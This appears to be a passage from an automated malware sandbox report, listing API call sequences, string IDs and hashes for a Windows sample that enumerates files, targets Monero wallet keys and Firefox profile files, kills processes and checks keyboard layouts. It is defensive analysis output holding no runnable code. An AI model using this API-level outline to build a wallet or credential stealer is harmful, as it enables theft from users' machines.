                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 18ecb343e7c0127d3f7032730b5d34233b400caa5a2d4cf5d9c8973c3858c384
                                        • Instruction ID: c24998078cb5f006cda52a82324474c056f1d01381671c43e785337ba3b2a5a8
                                        • Opcode Fuzzy Hash: 18ecb343e7c0127d3f7032730b5d34233b400caa5a2d4cf5d9c8973c3858c384
                                        • Instruction Fuzzy Hash: 39615BB19002189BCB34EBA4EC59FEA77BCAB48700F0045DCF649A6185EB75DB84CF91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E247D0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E247D7
                                        • wsprintfA.USER32 ref: 00E247F6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00E2480D
                                        • StrCmpCA.SHLWAPI(?,00E30FAC), ref: 00E2483B
                                        • StrCmpCA.SHLWAPI(?,00E30FB0), ref: 00E24851
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E248DB
                                        • FindClose.KERNEL32(000000FF), ref: 00E248F0
                                        • lstrcat.KERNEL32(?,01A8F1D8), ref: 00E24915
                                        • lstrcat.KERNEL32(?,01A8DA78), ref: 00E24928
                                        • lstrlen.KERNEL32(?), ref: 00E24935
                                        • lstrlen.KERNEL32(?), ref: 00E24946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: b1757ffdaeeeab974c3476efbfafc21a228ec5503efae052c3738514c13e7d5c
                                        • Instruction ID: 99b7152c738ccaf65423c5e4a6f153b58f852def7467f090446b72950a58e1a9
                                        • Opcode Fuzzy Hash: b1757ffdaeeeab974c3476efbfafc21a228ec5503efae052c3738514c13e7d5c
                                        • Instruction Fuzzy Hash: A55153B19002189BCB24EB74EC99FED77BCAB58700F4055D8F649A6084EB75DB84CF91
                                        APIs
                                        • wsprintfA.USER32 ref: 00E24113
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00E2412A
                                        • StrCmpCA.SHLWAPI(?,00E30F94), ref: 00E24158
                                        • StrCmpCA.SHLWAPI(?,00E30F98), ref: 00E2416E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E242BC
                                        • FindClose.KERNEL32(000000FF), ref: 00E242D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: 680fdccb8302b45e837d2c7271eed1d9afa9f0552a5e4b6f03273b6f67f08947
                                        • Instruction ID: 1ec9f1e32b9e26dd9545faa71f7b5c6a3ee2192e22398ec088c54d72cecfb870
                                        • Opcode Fuzzy Hash: 680fdccb8302b45e837d2c7271eed1d9afa9f0552a5e4b6f03273b6f67f08947
                                        • Instruction Fuzzy Hash: 805169B6900218ABCB34EBB0ED45EEA73BCBB54700F4055DDF649A6084DB759B85CF90
                                        APIs
                                        • wsprintfA.USER32 ref: 00E1EE3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00E1EE55
                                        • StrCmpCA.SHLWAPI(?,00E31630), ref: 00E1EEAB
                                        • StrCmpCA.SHLWAPI(?,00E31634), ref: 00E1EEC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1F3AE
                                        • FindClose.KERNEL32(000000FF), ref: 00E1F3C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: 81d3ed19f656fc565dd58cc19e6d10b052f493d2b682bfed6b3defc6bc99fc51
                                        • Instruction ID: aa6ac95d41c5733a93bae60c9bde6bc4a7a18b8677c8aa8247a61b8037edee93
                                        • Opcode Fuzzy Hash: 81d3ed19f656fc565dd58cc19e6d10b052f493d2b682bfed6b3defc6bc99fc51
                                        • Instruction Fuzzy Hash: 88E110729111289BDB54FB60ED62EEE73BDAF54300F4855E9B40A72092EE306F89CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                        • API String ID: 0-1562099544
                                        • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction ID: 38305e0411b1d5885c8b1d6319d2df50f651d289b61b93998b7f2a43a6d8ba56
                                        • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction Fuzzy Hash: BDE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E316B0,00E30D97), ref: 00E1F81E
                                        • StrCmpCA.SHLWAPI(?,00E316B4), ref: 00E1F86F
                                        • StrCmpCA.SHLWAPI(?,00E316B8), ref: 00E1F885
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1FBB1
                                        • FindClose.KERNEL32(000000FF), ref: 00E1FBC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                         • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 6f3c034ed48d782be60c404924e93cee1994563f1480166dc5c93d98d1e987c9
                                        • Instruction ID: 69889e2a1c7e6c0ffdb106149468770df5a5ce0a7f147d403fda9a3ac285cf84
                                        • Opcode Fuzzy Hash: 6f3c034ed48d782be60c404924e93cee1994563f1480166dc5c93d98d1e987c9
                                        • Instruction Fuzzy Hash: 9DB122719001289BCB24FF64ED96FED77B9AF54300F4495B8E50A76181EF31AB48CB92
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E3523C,?,?,?,00E352E4,?,?,00000000,?,00000000), ref: 00E11963
                                        • StrCmpCA.SHLWAPI(?,00E3538C), ref: 00E119B3
                                        • StrCmpCA.SHLWAPI(?,00E35434), ref: 00E119C9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E11D80
                                        • DeleteFileA.KERNEL32(00000000), ref: 00E11E0A
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E11E60
                                        • FindClose.KERNEL32(000000FF), ref: 00E11E72
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: 0b156c01b0a76e9b18a36363f5988d64e906ef3f8799a82b2c5c93994244b4c2
                                        • Instruction ID: 8952f95297d587a4d8fc0be566917d6f412d1b755f44f03a025602d7e012a631
                                        • Opcode Fuzzy Hash: 0b156c01b0a76e9b18a36363f5988d64e906ef3f8799a82b2c5c93994244b4c2
                                        • Instruction Fuzzy Hash: 1512E1719101289BCB19FB60EC66EEEB3B9AF54300F4855F9B50676191EF306B88CF51
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E30C32), ref: 00E1DF5E
                                        • StrCmpCA.SHLWAPI(?,00E315C0), ref: 00E1DFAE
                                        • StrCmpCA.SHLWAPI(?,00E315C4), ref: 00E1DFC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1E4E0
                                        • FindClose.KERNEL32(000000FF), ref: 00E1E4F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: b83bef8c6897eeec86b1279a637350a8ad28471881825fdda68a9fe9ffd9fc6d
                                        • Instruction ID: fabf58c382b98c6c7338764833d002ff159cafee85f3fd1701309aacefc11859
                                        • Opcode Fuzzy Hash: b83bef8c6897eeec86b1279a637350a8ad28471881825fdda68a9fe9ffd9fc6d
                                        • Instruction Fuzzy Hash: C9F191719141289BCB15FB60DDA6EEEB3B9BF54300F4865E9B40A72091DF306B89CF51
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                          • Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
                                          • Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92
                                          • Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,01A88B68,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
                                          • Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
                                          • Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22
                                          • Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E315A8,00E30BAF), ref: 00E1DBEB
                                        • StrCmpCA.SHLWAPI(?,00E315AC), ref: 00E1DC33
                                        • StrCmpCA.SHLWAPI(?,00E315B0), ref: 00E1DC49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E1DECC
                                        • FindClose.KERNEL32(000000FF), ref: 00E1DEDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 2cc97e41e2c7b83417411ddef29d2eedd28e415ff8a4257a70bfd69158eed878
                                        • Instruction ID: d9c73fcb7ef2a1b21e6f3fd13849bf7a3de697cc62875d225830e62aaa329c95
                                        • Opcode Fuzzy Hash: 2cc97e41e2c7b83417411ddef29d2eedd28e415ff8a4257a70bfd69158eed878
                                        • Instruction Fuzzy Hash: 2E9145B2A001189BCB14FB74ED979ED73BDAF94340F0459A8F90776185EE349B48CB92
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E29905
                                        • Process32First.KERNEL32(00E19FDE,00000128), ref: 00E29919
                                        • Process32Next.KERNEL32(00E19FDE,00000128), ref: 00E2992E
                                        • StrCmpCA.SHLWAPI(?,00E19FDE), ref: 00E29943
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E2995C
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E2997A
                                        • CloseHandle.KERNEL32(00000000), ref: 00E29987
                                        • CloseHandle.KERNEL32(00E19FDE), ref: 00E29993
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: f0d2bebc4fd7b38b59237fa29e0415131c529d6be85c0f0d32e3397944231e9f
                                        • Instruction ID: 5f5ea97308e1ecbf42021d414aef119a0bd6eadb9c58f21db002e1b53a5af718
                                        • Opcode Fuzzy Hash: f0d2bebc4fd7b38b59237fa29e0415131c529d6be85c0f0d32e3397944231e9f
                                        • Instruction Fuzzy Hash: 97111F75900318ABCB24DFA5EC48BDDB7B9BB88700F0055CCF545AA244D7799A84CF90
                                        APIs
                                          • Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,00E305B7), ref: 00E27D71
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E27D89
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E27D9D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E27DF2
                                        • LocalFree.KERNEL32(00000000), ref: 00E27EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: d1e744e0f8231fea1779e944f8c26beeea4de76f8c8843cfa361b97e7c959119
                                        • Instruction ID: 6381a3acdc7f8fb860bb4f52b2d2c7682bfd5357ba5e00c63ffdc2498d350e4b
                                        • Opcode Fuzzy Hash: d1e744e0f8231fea1779e944f8c26beeea4de76f8c8843cfa361b97e7c959119
                                        • Instruction Fuzzy Hash: E3413F71940228ABCB24DB94EC99BEEB7B5FF44700F2451D9E10A76281DB746F84CFA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 3!]y$5tw$Lr?$L|~'$L7w$t<oV$dg
                                        • API String ID: 0-1512165448
                                        • Opcode ID: ddcdceabe79febcc8d75f302a740908431663d4eef99f3caf18458fa87807d4e
                                        • Instruction ID: a8e3ba13caadabfb2c8d45d43c6cfea3de482454d17bc6546f27308c8cbe720f
                                        • Opcode Fuzzy Hash: ddcdceabe79febcc8d75f302a740908431663d4eef99f3caf18458fa87807d4e
                                        • Instruction Fuzzy Hash: F2B22AF360C2049FE304AE2DEC8567AB7E9EFD4720F1A493DEAC4C3744E67598058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: +Eo'$+Eo'$C4fz$SD?y$^nF${Pd2$Aw
                                        • API String ID: 0-2759302741
                                        • Opcode ID: 77d3b8c49c24af3d6b267754e4a1d58cc633e8c31b8d638cde5a4ef9c59326e3
                                        • Instruction ID: e3e77a927f0a297570bd4224b5611a6665003f5cf5a7cd3157c43617fe6ba35b
                                        • Opcode Fuzzy Hash: 77d3b8c49c24af3d6b267754e4a1d58cc633e8c31b8d638cde5a4ef9c59326e3
                                        • Instruction Fuzzy Hash: 0AB24AF3A0C2009FE708AE2DDC8567ABBE5EF94720F1A493DEAC5C7744E53598018697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F59000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.00000000010E6000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001289000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013A0000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390587144.00000000013AF000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390867596.00000000013B0000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390986229.000000000155A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1391004290.000000000155B000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 8F$0R{}$R?}$\+7z$\]zo$`]zo$aUw_
                                        • API String ID: 0-2169715473
                                        • Opcode ID: 0e872acd87ada11bbbf5ec76f0246614a17297282181d090fb829a78009c4089
                                        • Instruction ID: 941e69aaf8568b282571d10adbe3daec6a734b9a177dc2a8b7b4ed7f213b0302
                                        • Opcode Fuzzy Hash: 0e872acd87ada11bbbf5ec76f0246614a17297282181d090fb829a78009c4089
                                        • Instruction Fuzzy Hash: 9DB207F3A0C6009FE704AE2DEC8567ABBE5EFD4320F1A853DEAC4C7744E63558058696
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390587144.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                        • Associated: 00000000.00000002.1390348771.0000000000E10000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E11000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1390369268.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
